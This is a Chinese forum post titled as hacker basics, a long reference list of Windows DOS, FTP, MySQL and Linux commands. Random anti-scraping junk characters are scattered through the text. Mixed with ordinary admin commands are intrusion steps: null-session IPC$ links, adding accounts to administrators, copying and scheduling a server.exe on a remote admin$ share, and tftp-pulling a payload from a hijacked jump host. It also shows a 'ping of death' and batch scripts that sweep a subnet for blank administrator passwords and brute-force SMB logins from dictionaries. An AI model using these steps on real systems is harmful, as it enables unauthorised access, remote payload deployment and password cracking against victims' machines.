黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 0 B! r% T3 R- @' l
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 7 b% N& j* ?  m& O
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:   A' E( I# L0 i) }& s
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H:
+ o! e( b6 P3 C" S8 e0 G* znet use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 6 B& y- A- x& ]* S
net use h: /del 删除映射对方到本地的为H:的映射
$ z/ w8 N+ l0 S7 hnet user 用户名　密码　/add 建立用户   {0 C" U3 _, B. A+ O/ W- [
net user guest /active:yes 激活guest用户
  l! w1 t4 u+ C: _4 }. t6 Anet user 查看有哪些用户
3 a8 @: V  P8 M* @net user 帐户名 查看帐户的属性
' f) s- N& j: G) N4 H( Y. n% J! Onet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数   u, j9 P4 P: ?9 Z: B
net start 查看开启了哪些服务
  P# C, H( j: z0 hnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
( n$ O8 ~+ k$ `' P/ inet stop 服务名 停止某服务 . N! G4 B  a( y9 p
net time \\目标ip 查看对方时间 8 R& e# d2 P; g' K' {& s
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息 ; r, C" Q5 P; T- \3 {; }
net view 查看本地局域网内开启了哪些共享
& m' x1 }' B9 }) i6 ^net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 ' {+ e, R; P" |: t, v8 @  o
net config 显示系统网络设置 ! D8 R4 j% i  r% _1 q; z! z
net logoff 断开连接的共享 6 K6 I# ?* V4 @) ~0 s
net pause 服务名 暂停某服务 9 ?9 T, k8 @2 C! T7 q+ A
net send ip "文本信息" 向对方发信息
* P+ d1 P8 E6 b. l. Rnet ver 局域网内正在使用的网络连接类型和信息
0 O& c* \9 e: D$ U9 H, [( Xnet share 查看本地开启的共享 8 p3 ~7 q  ]. [, Q" v: J
net share ipc$ 开启ipc$共享
- r, u  p, W; I) R$ `net share ipc$ /del 删除ipc$共享
4 w. h% t+ }, U) `net share c$ /del 删除C：共享
+ q, M0 D; N5 X1 n8 ~9 s6 ?, Vnet user guest 12345 用guest用户登陆后用将密码改为12345 - Y) `( r+ R- ^; z; B+ }) U4 m* b
net password 密码 更改系统登陆密码 * {0 A# o1 q4 b! E
netstat -a 查看开启了哪些端口,常用netstat -an
- T) C' \8 b  X+ Wnetstat -n 查看端口的网络连接情况，常用netstat -an 7 r/ L. _+ G' W$ K! e9 ]7 o( q
netstat -v 查看正在进行的工作 0 D: O/ M+ J; w, n" j; O- t
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
' c4 g1 h8 J+ Lnetstat -s 查看正在使用的所有协议使用情况 . U0 p* I4 {: @. n0 V
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 9 {% N6 y  U" ~  @8 k. x
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 * q2 a4 w4 w- w* X5 l- L
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
! x: ~& u. U& D) Jping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) ) C- A' e0 _. }& W# R
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
0 r7 u( ], O7 Q1 v& P/ ntlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 0 d% ^) Q, C. D  r2 Y0 r' H9 M
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ' R7 ^7 C, Y& k( {! U/ W
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 % r4 J  D4 Q  C9 x: C" y( v
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
' `3 A9 p0 \* ^7 {/ @. Jmove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 % ^7 ]" U0 j& Q0 A$ A- b% j# Y" n1 u5 c
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
+ {) g* J' I2 K2 _7 Pat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
- i/ [- [' d6 ~2 C( dat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 ( ?, g7 g7 m% ^8 }
at id号 /delete 停止某个已注册的计划任务 : f1 E6 G) ~- M$ x
at 查看所有的计划任务 . ^4 x9 [; U# D; I- Y8 A
at [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 9 B+ C) K1 C6 D
finger username @host 查看最近有哪些用户登陆 8 L& h* Q2 J+ g6 b4 B  |5 E4 W# a4 T; z( }
telnet ip 端口 远和登陆服务器,默认端口为23   F, z& q# x6 ^5 {7 o4 N
open ip 连接到IP（属telnet登陆后的命令） : t8 N* p, K9 Z! ^: B
telnet 在本机上直接键入telnet 将进入本机的telnet 9 h' N" n7 C1 P& ~8 o! o
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 $ ]6 |3 _  r6 O% j6 _1 H% ?4 _+ O
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
) D2 K1 I% ^1 m7 |; ~- gcppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 : e/ u* H/ I/ S1 g
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： : G. t% y9 L% m  w, m7 K
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
3 k2 m0 K; g2 I: _8 I, ?tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
9 T9 E6 a3 U1 }( N1 ^5 J! |tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 ) l8 f6 N2 ]4 o2 i; @5 C/ T1 q5 F
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)
+ [! m2 {% F% hroute print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
% C- `2 v7 f3 l* S0 D6 [( _arp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
/ V! m9 q, D7 r( @( G) Dstart 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
# `0 h" [& |- e1 l# a1 ^* X: Pmem 查看cpu使用情况
7 i9 I* W- V/ j* U! A6 R! q- T! K) e! H4 hattrib 文件名(目录名) 查看某文件（目录）的属性 : X8 f2 K( o" a( C$ b; j
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
! E4 ~! I1 o' T. `+ L) n9 Xdir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 8 R. n+ E& I: e
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 + b9 e( E- d" @: W  ]8 h* n: r
set 指定环境变量名称=要指派给变量的字符 设置环境变量
+ f! s% Q. O) l* T0 |+ Xset 显示当前所有的环境变量
% J( Q! l5 K# Z$ o- K1 ^3 wset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
; ?& }+ _5 |; Upause 暂停批处理程序，并显示出：请按任意键继续....
5 x/ K9 g( }; B0 J1 O2 Wif 在批处理程序中执行条件处理（更多说明见if命令及变量）
6 W1 {7 T# `8 I1 |goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
* h" |5 q6 ~( K/ X3 `+ qcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
+ e9 Z" R& q4 A1 J% j8 Kfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） ! U8 k; N2 l' r( |' s
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 2 W6 q' I! G2 I) K- M; \* O
echo 信息 在屏幕上显示出信息 % X2 M9 R' v* k% Y
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
6 Q9 w9 j0 v9 J, Dfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
$ j1 R* D( }. q! }8 m8 Z( nfind 文件名 查找某文件 ' Z0 u: _  n) S' V7 E2 V
title 标题名字 更改CMD窗口标题名字
# F5 J2 R6 I, [. d: q& gcolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 5 z; S  E$ L5 _8 F/ ?4 g) `
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
  [$ U# H  |( n! Kprint 文件名 打印文本文件 ! z$ q( v; r7 {5 h
ver 在DOS窗口下显示版本信息
2 K/ J+ z9 k2 K3 Twinver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） / C6 `7 ?- O$ x4 q; ^1 Z/ V1 ^1 X
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
/ {+ a& Z. n! ^md　目录名 创建目录 . s9 _' t4 q0 M+ H  }& J$ @( K4 W
replace 源文件　要替换文件的目录 替换文件
7 j: a8 q/ c9 j- S1 @ren 原文件名　新文件名 重命名文件名 7 e) u% y' u, q2 b
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 / q6 D* A, k0 {/ r; p
type 文件名 显示文本文件的内容
  m& k$ L9 s  A  L' Y, Ymore 文件名 逐屏显示输出文件
4 \3 s. B. Z5 |5 Mdoskey 要锁定的命令＝字符
; r/ d6 y! G) t; D' Wdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=   q) Q8 M; j# B6 H
taskmgr 调出任务管理器
$ R8 @, x/ w" \3 H5 _6 n( Mchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误
) p1 X, C* a) C" ]1 Htlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
/ f, k, M4 e9 z/ \5 B1 u/ e! N& t+ wexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
( D# j, c& I5 y1 Y" e( P0 zpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
2 n- d' u8 Q, Y4 n  q- `) ?  R4 Bcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
9 Z4 L6 _& N- `. O6 O0 Fregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
0 i2 W! R; M) Q- E% A: bregedit /e 注册表文件名 导出注册表
- E, }4 t" C! Y  a& Acacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
' |  q+ z; T" y' Kcacls 文件名 查看文件的访问用户权限列表 * V' p# n8 q% ~& j. _
REM 文本内容 在批处理文件中添加注解
$ T# @& S& U' z6 Fnetsh 查看或更改本地网络配置情况
! M  v7 L1 G" B& h9 O* B. b; o: B& p$ OIIS服务命令：
1 ^' a, V" i! j& i6 L0 f. Liisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现）   x3 o. U- c* W; c2 U) z
iisreset /start或stop 启动（停止）所有Internet服务
+ _. e4 h9 T2 e5 {: h1 ^3 R3 @iisreset /restart 停止然后重新启动所有Internet服务 0 S6 V! E8 z4 C; _
iisreset /status 显示所有Internet服务状态
5 a0 C  e& Z/ V, kiisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动 ' |- ]( A1 g, t- A' _1 R# ^
iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 3 F0 }" ^+ E. H$ s3 y4 f" _
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 ( p$ W0 c5 C3 X1 [  B) z
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
6 r8 Q! s( e" M5 z/ X% N: hFTP 命令： (后面有详细说明内容)
* Q5 S9 s# ]3 T6 tftp的命令行格式为:: z  |1 g# p! Z
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
6 M$ |: J# n* K0 w: f: T－d 使用调试方式。 * C; K! u5 W) H, y# `0 J( t
－n 限制ftp的自动登录,即不使用.netrc文件。7 a) f1 u5 M) f2 r1 a
－g 取消全局文件名。
& x1 J' ?* ^: q2 q& V3 v6 jhelp [命令] 或 ？[命令] 查看命令说明 9 ?1 n; Y3 a7 Z
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
8 s  s' a' ?" a8 l& |$ fpwd 列出当前远端主机目录
4 ~3 F7 k' a9 Q! Fput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
. J+ T, o7 `+ a0 Z, \# P1 Pget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 : t6 v3 Z% O) D4 ]% ?
mget [remote-files] 从远端主机接收一批文件至本地主机 + z. R5 B' R- R5 Z8 H6 ]1 r
mput local-files 将本地主机中一批文件传送至远端主机 - S. U; k9 _& d7 S- \
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 $ u# o2 i; E& I0 X; K, w
ascii 设定以ASCII方式传送文件(缺省值)
; B; N. I, g) c  rbin 或 image 设定以二进制方式传送文件 0 O+ L0 f; P1 i) G6 q
bell 每完成一次文件传送,报警提示
1 r% P( V. Z+ \' v- Vcdup 返回上一级目录
) c0 [: ?+ l( I! r5 Tclose 中断与远程服务器的ftp会话(与open对应) 0 X! i& ]+ U- n& G+ }: {. A
open host[port] 建立指定ftp服务器连接,可指定连接端口 : l+ g* Q1 H/ A1 z
delete 删除远端主机中的文件
& a9 l* [9 D, [mdelete [remote-files] 删除一批文件 6 B9 k: o1 |9 w% ^" v. ]0 E* o7 j
mkdir directory-name 在远端主机中建立目录 ( B$ o3 Q+ q  W& o
rename [from] [to] 改变远端主机中的文件名
" m2 |" Y6 ]( R( I" N+ \rmdir directory-name 删除远端主机中的目录 $ H! H9 q6 _& l6 l3 P
status 显示当前FTP的状态 1 p0 a% x8 y+ q" V0 U7 m
system 显示远端主机系统类型
; d( v/ p- w8 W* v9 T( g; f5 m/ b- u8 Duser user-name [password] [account] 重新以别的用户名登录远端主机
; [9 o* ^; \8 E! x8 m4 |" O  dopen host [port] 重新建立一个新的连接
* \' {. o( G2 R% xprompt 交互提示模式
. [$ }2 i* Z" d% I. |macdef 定义宏命令 6 f) }" Q8 C' H1 F& I8 N
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录
7 r, r* y# _5 b1 P! K) a1 U6 echmod 改变远端主机的文件权限 / T; F. j( {* E! Z
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
. t; L* I. o0 C& N& ecd remote－dir 进入远程主机目录 ; M9 j! v* x- l/ y2 ?
cdup 进入远程主机目录的父目录
; }6 x1 `/ ]' S5 C) N4 l! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
- y% G  ?4 e1 O# g0 P# @; aMYSQL 命令： 6 x; W/ F9 ?3 d/ p8 d
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
- g! T+ f: r+ e（例：mysql -h110.110.110.110 -Uroot -P123456 : f- ^/ \4 b# X$ Q& p8 j6 N
注:u与root可以不用加空格，其它也一样）
& p2 j* Q5 i* y4 @; R6 f8 iexit 退出MYSQL " n7 s6 e. E& s9 d) U& @# Y0 B
mysqladmin -u用户名 -p旧密码 password 新密码 修改密码
; _9 ?- T: m$ q  `+ Dgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 6 N7 Q/ M- w" P8 V2 i2 p1 t
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 6 n4 R6 q8 k" ?  N! q& h$ e( C/ M
use mysql；& Q( n- `/ u  P! @$ o# [
show tables; 显示库中的数据表 ' `' D* R! A: x: j
describe 表名; 显示数据表的结构
4 h$ I5 v8 f/ bcreate database 库名; 建库 9 |9 `3 t5 E# Y' D1 L
use 库名；2 P. e9 P" h3 U6 X; R5 C/ }0 Y; F
create table 表名 (字段设定列表)； 建表 : U- ]& s' N% K
drop database 库名;
1 n0 t& K" p* Y% A- I. Z9 vdrop table 表名； 删库和删表 ) w( n9 {, K3 u) u6 y% B* ^
delete from 表名; 将表中记录清空
: p2 L* @2 s- n  Y6 M" F7 Vselect * from 表名; 显示表中的记录
# c% @8 E5 z& ]" Kmysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
8 }6 O8 U& q+ Z" q  G5 p2 }win2003系统下新增命令（实用部份）：
" f' x# Y) |7 W3 X$ m7 K, w) Qshutdown /参数 关闭或重启本地或远程主机。0 Q- o8 @' T" x/ x1 G4 K
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
$ z$ W# W* W+ t6 o0 \( T+ `例：shutdown /r /t 0 立即重启本地主机（无延时） 7 M* ]; {3 u8 t) K( b
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
& C% b9 j/ X" |/ j% O6 G- m# g参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
7 k$ M- d4 l1 [7 j) J* utasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。5 b; N  ^( e& y  ]
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
0 F- o- x- ]3 FLinux系统下基本命令： 要区分大小写
5 `2 p" o# C, X) Funame 显示版本信息（同win2K的 ver）
; x6 N+ Q$ @& [3 h9 V' M' Q) cdir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
0 P9 N/ }2 F3 d) b4 c: c' A; tpwd 查询当前所在的目录位置 : ^9 f- R! w" R8 q/ `
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 6 e6 `( g9 q5 q8 A" x7 S
cat 文件名 查看文件内容
8 l8 Y" r& v1 r5 e/ Hcat >abc.txt 往abc.txt文件中写上内容。
0 L: T3 n3 I% ?  p, i- dmore 文件名 以一页一页的方式显示一个文本文件。
+ j* q( i* H4 |' ucp 复制文件
# Q) i/ B9 Y6 }mv 移动文件 . g7 V  X: k$ l& Z+ q  x
rm 文件名 删除文件，rm -a 目录名删除目录及子目录   g) M5 m, l2 a* ^; C5 Q; B$ v2 Q
mkdir 目录名 建立目录 $ s) P8 Z* Z7 k( ?) I( Q# [
rmdir 删除子目录，目录内没有文档。 : e* R3 N+ A  Z) I, O
chmod 设定档案或目录的存取权限
$ Q9 a& m9 N0 r) t* Jgrep 在档案中查找字符串 ' F" q' ?7 {  y9 l8 R. {
diff 档案文件比较
6 B, c/ W8 v8 R% {find 档案搜寻 ! l7 E% ?6 H8 X. }3 ?1 n1 M
date 现在的日期、时间
  X; {1 _0 N/ Z7 {; nwho 查询目前和你使用同一台机器的人以及Login时间地点
% g: M$ b; {1 X3 e# h. jw 查询目前上机者的详细资料
9 y' S, N* H( Z: v# ^6 i$ W6 Ewhoami 查看自己的帐号名称
- \& J; @# w4 Agroups 查看某人的Group & A% @- z, t6 h" R' l
passwd 更改密码 / z6 E. e) z5 V" U7 K6 x7 \6 e
history 查看自己下过的命令
  ]: ^- ~: |1 w' g4 Gps 显示进程状态
0 f& g7 U' q8 t& o" R, ?3 }6 tkill 停止某进程 4 W: J. q/ J- v' e* W) h1 u
gcc 黑客通常用它来编译C语言写的文件 9 Q& v8 T. L7 ?! z4 |& f
su 权限转换为指定使用者
1 y: }8 T5 C: l5 x, Stelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 ( R9 \; w" M$ q: X; K. f' _
ftp ftp连接上某服务器（同win2K
* k  ~' l9 h4 c2 L) o& Z附：批处理命令与变量
! n  A2 V/ C6 s/ {# V1 R1：for命令及变量 基本格式：
# T' x4 u( e0 M* PFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。2 X# D! T4 Z1 \* l
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
5 d3 U9 v5 e( n- a* i2 P/ g(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}; Y9 U6 o" c4 I3 H9 j) n7 m
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开- g5 ?4 a% b% E; t% C/ T8 i
command_parameters：为特定命令指定参数或命令行开关. Z/ P/ Q2 x! q+ u: G
IN (set)：指在(set)中取值；DO command ：指执行command
; I$ g1 F* w) n0 L9 W2 I  a9 k参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
! {' R9 H" {7 M# ?0 \# _用法举例：
3 [3 s/ ~) ~: e# ]@echo off " v4 p5 k0 q7 \7 u0 G( R' w
echo 用法格式：test.bat *.*.* > test.txt
; u. l! @* y' T) N8 g. }+ ?for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
- ~! @% i- s  r存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
, d5 |& U: k: B* X1 {. ~3 \/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 ! D# Z$ ]) i' y) C  g% p) r
@echo off
, l; g  u( U2 M2 [/ T6 mecho 用法格式：ok.bat ip 1 r8 V3 g) i* C8 A6 ^
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
  h/ O$ L3 W4 f! a% l; q存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。/ X5 U; \" B/ p/ Q# f4 y$ M; P) j
2：if命令及变量 基本格式： ! s; K7 X- A; o8 O% h: o
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
  B" S; A; ?5 x- S' o1 x例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。5 x0 {. y% k6 Z, b, o$ z6 t. c9 |
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
( ]7 A+ \4 X) j- E+ y+ n, m+ g! I5 kIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。$ @0 p8 h1 K6 @# L8 @
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） : \% ~, _! \$ F6 T1 g
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
) p2 E: z. _9 R例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
. s/ y6 |& f% t. U' lIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”